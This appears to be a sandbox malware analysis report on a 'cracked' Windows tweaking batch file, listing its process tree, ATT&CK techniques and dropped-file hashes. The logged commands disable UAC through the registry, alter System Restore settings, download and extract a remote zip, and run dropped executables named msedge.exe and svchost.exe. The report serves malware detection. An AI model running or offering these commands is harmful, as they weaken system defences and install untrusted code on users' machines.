  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
  2⤵
  PID:1120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
  2⤵
  PID:4720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7412 /prefetch:1
  2⤵
  PID:2740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
  2⤵
  PID:732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7520 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\EXMPremiumTweaker.bat" "
  2⤵
  PID:688
- - C:\Windows\system32\reg.exe
    Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
    3⤵
    PID:3752
- - C:\Windows\system32\reg.exe
    Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
    3⤵
    PID:4280
- - C:\Windows\system32\reg.exe
    Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
    3⤵
    PID:4728
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5052
- - C:\Windows\system32\reg.exe
    Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
    3⤵
    - UAC bypass
    PID:5044
- - C:\Windows\system32\reg.exe
    Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f
    3⤵
    PID:948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"
    3⤵
    PID:5040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path Win32_UserAccount where name="Admin" get sid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1360
  - - C:\Windows\system32\findstr.exe
      findstr "S-"
      4⤵
      PID:4900
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:4692
- - C:\Windows\system32\chcp.com
    chcp 437
    3⤵
    PID:3596
- - C:\Windows\system32\curl.exe
    curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\nvidiaProfileInspector.zip" "https://github.com/Orbmu2k/nvidiaProfileInspector/releases/latest/download/nvidiaProfileInspector.zip"
    3⤵
    PID:756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\nvidiaProfileInspector.zip' -DestinationPath 'C:\Exm\NvidiaProfileInspector\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2900
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:5044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7996 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:1
  2⤵
  PID:1508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1864,4543692850375187124,823250221287187748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1644 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\EXM Premium Tweaking Utility 1.0 Cracked.bat" "
  2⤵
  PID:1564
- - C:\Windows\system32\reg.exe
    Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
    3⤵
    PID:4668
- - C:\Windows\system32\reg.exe
    Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
    3⤵
    PID:564
- - C:\Windows\system32\reg.exe
    Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
    3⤵
    PID:712
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1532
- - C:\Windows\system32\reg.exe
    Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
    3⤵
    - UAC bypass
    PID:2604
- - C:\Windows\system32\reg.exe
    Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f
    3⤵
    PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"
    3⤵
    PID:4216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path Win32_UserAccount where name="Admin" get sid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:200
  - - C:\Windows\system32\findstr.exe
      findstr "S-"
      4⤵
      PID:4540
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:4180
- - C:\Windows\system32\chcp.com
    chcp 437
    3⤵
    PID:3552
- - C:\Windows\system32\curl.exe
    curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"
    3⤵
    PID:3172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1276
- - C:\Exm\EXMservice.exe
    EXMservice.exe
    3⤵
    - Executes dropped EXE
    PID:1936
  - - C:\Users\Admin\msedge.exe
      "C:\Users\Admin\msedge.exe"
      4⤵
      Executes dropped EXE
      PID:240
  - - C:\Users\Admin\svchost.exe
      "C:\Users\Admin\svchost.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:404
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:2632

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4804

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3364

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004C0
1⤵
PID:332

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Exm\EXMservice.exe

Filesize
12.0MB

MD5
aab9c36b98e2aeff996b3b38db070527

SHA1
4c2910e1e9b643f16269a2e59e3ada80fa70e5fa

SHA256
c148cc14f15b71a2d3f5e6bce6b706744f6b373a7e6c090c14f46f81d2d6e82f

SHA512
0db75756a041a7cda6b384718581aaf11e6873614465dd56e81f17ad171cffe380e288a3c2ee540222190392904921f26df8a1d66d4108051c60fc8e5b2df779

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
88dc70c361a22feac57b031dd9c1f02f

SHA1
a9b4732260c2a323750022a73480f229ce25d46d

SHA256
43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

SHA512
19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fdee96b970080ef7f5bfa5964075575e

SHA1
2c821998dc2674d291bfa83a4df46814f0c29ab4

SHA256
a241023f360b300e56b2b0e1205b651e1244b222e1f55245ca2d06d3162a62f0

SHA512
20875c3002323f5a9b1b71917d6bd4e4c718c9ca325c90335bd475ddcb25eac94cb3f29795fa6476d6d6e757622b8b0577f008eec2c739c2eec71d2e8b372cff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
46e6ad711a84b5dc7b30b75297d64875

SHA1
8ca343bfab1e2c04e67b9b16b8e06ba463b4f485

SHA256
77b51492a40a511e57e7a7ecf76715a2fd46533c0f0d0d5a758f0224e201c77f

SHA512
8472710b638b0aeee4678f41ed2dff72b39b929b2802716c0c9f96db24c63096b94c9969575e4698f16e412f82668b5c9b5cb747e8a2219429dbb476a31d297e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\7186577c-8e34-41e8-9529-1ae2656e1e64.tmp

Filesize
1KB

MD5
b13f2078c35597e97bbb617574dded9b

SHA1
b310442d74eb65b170d5e75c46856ccb0358aa3c

SHA256
60957c0895c8c26ccf1f8e9d690f70d4dffdde3e893f5d63800dba8b3d5e7776

SHA512
29eb538162ba0e26fbfd0db25f3a3b74008972f9585bdf8ead96846578650b4e05845c46cc436df1b0232ce63c32ec6c9e0a69c52770461d5a0ee7f2871acea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
32KB

MD5
3a424bb561ae752690676fefb1bceb8f

SHA1
3d56a08693e150b38ce6ffcdc3d772a5b52f8ca2

SHA256
53fc575fab4674e387d7ee82cfac0958744e8890d951ab96761057d4e88c9fef

SHA512
9674cfa1f800d71678ff3f9ebf623c9c188f4467a8aec02c7ef5704b34866d751b1c6254f46fae86138e45035083de220f6658f8d0ae0df5b4e5aeb787a1edc1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

Filesize
215KB

MD5
2be38925751dc3580e84c3af3a87f98d

SHA1
8a390d24e6588bef5da1d3db713784c11ca58921

SHA256
1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b

SHA512
1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002f

Filesize
20KB

MD5
87e8230a9ca3f0c5ccfa56f70276e2f2

SHA1
eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7

SHA256
e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9

SHA512
37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000042

Filesize
18KB

MD5
01a1b982e5152d00e14d6166a6385b2a

SHA1
d9b47fb87245a5c25e954c2ac432c17667651b7f

SHA256
234d76379d85e1d0d1abada13eb9b0ad5f85c883cf3c6acd9e29e5495ec4444c

SHA512
0e5a63ce0f4e30e4f20813c4fdc60fd7a280f01da809a80b88f1c21bb0ee05fb7703b5397f37246498f73253274d003890ec9050703a7901aefd1c7d7cbf0f57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
0f625409711f66908b921c7eb4d911ef

SHA1
ce60bba1e540e54501e3029b98bc722f893f6f1b

SHA256
3bf8b083fc68105707c0c0d1a91b417aafb2626d72de3012142fec73f64828ba

SHA512
831d906abeab869ae2286dd8cbb3ed9b1bd1cb1792e182f94cb3e9f94c5b7e196af6f954d1a4394abeb051aa1b92e4efeeffc0657747a7f557c280aed19aa173

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
21b71f6617d117be461616e30d436623

SHA1
4e64bdc32d992e1dad79a0636f1582817b197dac

SHA256
46e5bc36623086a6c690438b0419266cb5cacc634be54d776c7e5a6b40822c1f

SHA512
7ae84d48528a59db3f2ebd9426b5c40bd6af61198d4fef02d88003e22a990b931cb2396a8f8e7b74e9df2e091feca5e561e34f9be89db508d66c2d40501a8ccb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
964972eb1c3d5b12c1ed4376a5dcf47e

SHA1
07f645b78791b4c73f75b839ed3a4a1589093498

SHA256
32ea20f6e336f0291c1572bbafd9de6aa3145f1bb8c712ae28d7cbc2d9ab0af0

SHA512
2e6693a586e1814ca669ae530f5a9c1a9df85010929648ec98f7de4f9ce8e7eb8ee84ed0b643fd838ba0f1dbeacd053ed258a651cc09bfb3ebe8b0a5d425ec63

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
e66083f43d9a81fdf8c4b582c269acca

SHA1
58f906e2e13da54a9ee182e1524aba85ab91e644

SHA256
1b6788b67c4ea3c488abcb84adf4ca6a2dffae3d308089a2f95285a9580159ff

SHA512
fb5a328a2650b387eeb4936c33a642ff552711c199f833f3ab8c17b69b5851ed508792f8c8824943acc8184cfd96f332425bf2156ddbaf704ce6ef9ce3866f70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
a4a9013fe249ab149634f26b795836f2

SHA1
b13a47fbd4569594f22083e49e062267d13c9421

SHA256
99b1bf9de7d327c01cd22d935ec49185c38d042af050eb44d92cb5d710aa2fa1

SHA512
95003b4bcddd1b94bd8d03e5b2ae851ef24a3c3f9d900b32a4d510d9b7149ed03dd92274da8f68e61611428e7beb32f09d3ed71013919a31aa3eed54b0883175

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
de90fddb366fbad876809b912ea74b2a

SHA1
72ba2787a4589ccc0b516e16bf88e5ce44a97e41

SHA256
3943761ec0c5ad4ca9e33469b9a63154edd586154ac669bd61faa9414828d154

SHA512
cf5d2b8cf1cddad8be40767365644e4fa10230cc5a42e64ec495d7353c33806645145f69a323a3d640e8de933833bf03efa087878334c68342d4f8e8ff1190ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
c87e0400c5c841d8762d5ace5c1a6d7b

SHA1
cb062b90d127869fc8834c38b3e97c8567345969

SHA256
e9190c89635a3f2fa5c892a09a84a3a93168c8e7bdc4db344997a7f85fa4bf54

SHA512
e45c749ada57d9f007374f69490e2c7f2a4467d130b771953e19a43b12138859e19270d4c4755beea1f888c9d571a396e0d0fa7762dc6d3f4565c402ef5fbbf5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c9fd38c0566fd4ff1e6479f105e6fc7c

SHA1
0cf1b48ce7257a1cb4a70a74f6f4565372c97e9a

SHA256
00b5934afe276778e29a9d81badc92509b4f2b3242907a21ac6be749cb9c7d4c

SHA512
daa755e02edf7f18845833e3017db06c1ef450ca8d0227b06cf3b02169c16c97e977a6857f4b9d0a5907205587b93a2c580cec34a776842796d1254efb18ae51

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\7a7900728ee0d4f5a270f7a3f0e134839df593ed\17198603-57eb-4099-8cfb-dab546f14e9c\index-dir\the-real-index

Filesize
72B

MD5
421ce4463d55cde1bdeb79410cce1dc1

SHA1
4620ad276a78bb307aad83ae926f6ea6652539e9

SHA256
a30f94afdcba540a181cc54e07a9fe4b740659d4e215bb0def0ae0ed3934b84e

SHA512
8dce3cab4d345a16d70197921671e756a6417ba3b1095beb2992b1e998f9650a9e0731f0d58defe1c6abcc854b075a5b4f04e7fda9f9f53c1c006197b9b3177c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\7a7900728ee0d4f5a270f7a3f0e134839df593ed\17198603-57eb-4099-8cfb-dab546f14e9c\index-dir\the-real-index~RFe57f26e.TMP

Filesize
48B

MD5
f236180cec0d8f572e55ec52a96f0836

SHA1
0b2656aa861a3284db2df960597d2362cec92fd2

SHA256
6224dd42f4ad9506bbe8236e403659d9cca7b998b0ed49d1b128ef35463275ef

SHA512
f0663b8914828e6b2bfd5d830e431c688bbd1c32435edb4978ede68a93990f497c3a8dd258050815d983646a61dc7ed39d13a85a4618db66c35abc1ab3014bc2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\7a7900728ee0d4f5a270f7a3f0e134839df593ed\index.txt

Filesize
116B

MD5
bc7e38d0983f011f8abda3334a85fb77

SHA1
a039509b2fa86a7d2fe1bd5eb0873c64d7b547f6

SHA256
21f89e47d1876a9b0e80f643eeb3dad3650dd596d92afeca040ac4c2f68a7e61

SHA512
8489d2d038ad07d9493a8dad26e3bcdf03cd8a35acfe96d6855550c36dbf24443db0342201564e758179bd1178f6c1d93777a79e3ab778b89dcd1080286bcd69

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\7a7900728ee0d4f5a270f7a3f0e134839df593ed\index.txt

Filesize
110B

MD5
8aa2f4f4abb5e07f71bf390157e7fff7

SHA1
0217117a657150965ae8a8c9d2118a3729ea6b28

SHA256
7ed5b270f8a62510bb1a876231d7e18449819c59762bff785248c6d2246d08d4

SHA512
6e9eb651863f4f45d312aa421ac977c48bc19730d47c30a9fbff291c58a1c59dca896fb6454fd810f1970b32874101f528ccceb4ffd90dd92b0224f51e69faf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
7c3fe0965500e53964204b7c7db98a4d

SHA1
008e6b38de628b1c940071383a8d50d768bdd5aa

SHA256
ee1a63b8a757c005780cbddf48bb482b56b1233f7a5f56224cefd206cfc13b14

SHA512
b714ad8ae0b10599122d780e39815985469298b27cc868c73324f7c0da0091f03e01f8d29ed6852ba165adb5019bce43618b230b3a5d89e7923f4a720a62d015

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
5109741f429e68934c7702b7903a8c17

SHA1
b3493b1c8f86c1455cb397259e9029b8edfdab39

SHA256
5fd040ef5341970c5a83bda0f880c02aa04aefc127933eea9e8c8b332c8a0dd3

SHA512
e5bd54d34c153a1132b5423c19b69685f7b8169812f4d80d9d15f89c25fa169b27bb1dba868f2f9bd21ce522991c0fcb7bca1ae1fb7a5b06751adcf85a6dc431

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57f1b3.TMP

Filesize
48B

MD5
1192c5cee9c324a94e4c57c27f18659c

SHA1
e4f056351c6e88ced9e52470c71ee7ad124950d3

SHA256
dd676107654f47b6303bd8fa8b7fc6ce982b192f1de3ab867b3b7468e6b9d6bb

SHA512
9ff282da1a3faa847800eef86954b534156cc6e7e256763b946a9f4284ddfa3cc9e9073eaf776d71e6357ae72c25fde01d295a9126eeecdefafa311d7de0d433

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
34e40ba949b75aebf3dcbcba6b42bb6f

SHA1
eb49af8bc613d4ddf1b51c9bdb5b9a80bf36ddd2

SHA256
887ce42cce90abf51a8ca69ce0c268a33bae70c7654f8bb56a1361d7917624de

SHA512
e37ded1e24bdcb9a8a92d66fcac50f88dda2e2fdfe5724c61c8987eb57272481385ae7a4f6b986c4e86d225cb090d4aa4c438bf04c892d3820cc3e9f573fe832

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
a2bff1516d58a63cdb87643f7f0501f2

SHA1
30d6b442feda4aee36933de8ed421fc4a927c0d6

SHA256
a20fcfc8026af1d6d5ee37f29d5dc0b639dd75f78523ab98004d42e9cc3a181c

SHA512
a5f40143b797ce9d1ec9fd891c7e96ecd0be42a715afc909fa4565f2ec78ca895d9bc569300f225f36aaf2e9561866cd5cb831a7d63c4b23385b53887e3ee3e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
ec77f6c3911c23041fc5cd0b5f2f5d74

SHA1
37ab4967609af55c9386eec22f6a92ae93b7ad60

SHA256
45e2cb5662d1e9510bb046196d8ab8786c326ad6e8b5ba14949720eeeabce77f

SHA512
12b007ea4bfa2d6f9665411d6900b10d9aff32130274e09e71833235716bbb8337da3fde97c7871fbe6eabb187b5dfbda83f812230463b40dc2aa6614fe50c93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
9dbed19e82ef47494fa29f8f5c15df20

SHA1
a56399f27e61ced7e31de0494d6b759523920c56

SHA256
c091a5ed0f845b01ce53c45ded0b8ae0ab5c9ab5d2517e4a0065e5eb8c7228d1

SHA512
e89d2277fe4e003116892ddcc420008db975570c6b949b9211f8169315e75f54a92fb6238ef2f0de3a1d0239b8243574ab346775218b422f81680d565a8e26b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe580cbd.TMP

Filesize
872B

MD5
b056897875f575300ec6978424379864

SHA1
f8a749ac62195d1ba79d69d19f025d54e5a532eb

SHA256
4df99470805f1e2d37d84f2b7b3034d4c0d27067ac378a3c3da3b4b963b9a0d3

SHA512
736bfe447094e810ae7d35505f878ef69d996cc2f10c7621af7b659a12b151aa1c9f041a93be07d858d55db68faded973bfd59a1fa8f4ae2c265f09cafe89e5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
404ae9e1566297ce8e868bcf8fe24878

SHA1
a7c8ba3af69ee1fd624f8212cb97786d17be777b

SHA256
da297b027b54be16a4eda2a4a7586021a6e912a09dbfd5bcb0a4ee92f8a2073b

SHA512
6a2b1ae7e84df223808291e556b05c26b80fc594c27b4891c637bb10dcdeb84bfacdf8c8028e7f10b5855b03a60217de1d036211cf51d469336692a7ffa74931

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
3390f1a8827532a48f4dbfe5c0606a63

SHA1
614fd840acd8eb88289efa0239c6c346a90ab1c7

SHA256
6e290eb5aa53f219597aa8a639d09bc94eacbd195023ebe06c000219bf0dc02e

SHA512
9af18e759456a2df7321fdd17aa844b4bb9917510c226ed6f87054c973d16c30e0e5fc3da47f2747b8747c0837a87e0686f1a33128e152da4f65ebda86f3da2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
8d8ca0e83b3b890c607fe35f4bf8b7aa

SHA1
ad7e15852065c14433e5c7cad81324ba93145cba

SHA256
9a950f334a675d39effe184b3dd7b55b773ff690efbbc34b39280b65cd397cdc

SHA512
8cd3629e9ddda3e3328ea035d6dcbda298a323d28d5ccde5b9152d4d2c59188e793b70332f34eed3e53bc659096c7e1504e63f21c9f8f53ae1e35f1d77f799b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7932fbcd92027dfff5611896f9355757

SHA1
ed7c38ef6708e13f64be2196dc51acb780619fe2

SHA256
1b6e24e1d7ae400dcdabebc263a85243d02ec01ab848768defdb3af6b790c1f3

SHA512
d5d3587550e61d4aa7a29a085502232224b958af7ed6c878c1f179e5faeab5245703698dd475bc518a5e498edf2174b7e76d04bb85ae098666580291781eee6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
9fb88303ff86933b712bdfdda11a9999

SHA1
f80c7c05badd64231037680d71186e518f0fa505

SHA256
6d77265cf199e8551f5161e1418c9f0a97cb341176354e66ce34093c4b3c2b07

SHA512
a58191ca14dda7bc55c3475fc392067d8e5fc0dba73d5fab6411c7e690e0f59c4bd06c8f25763b05cb6fe5d9191ef9127b30889612eb9dc048be75b74b8d84ed

Download Submit
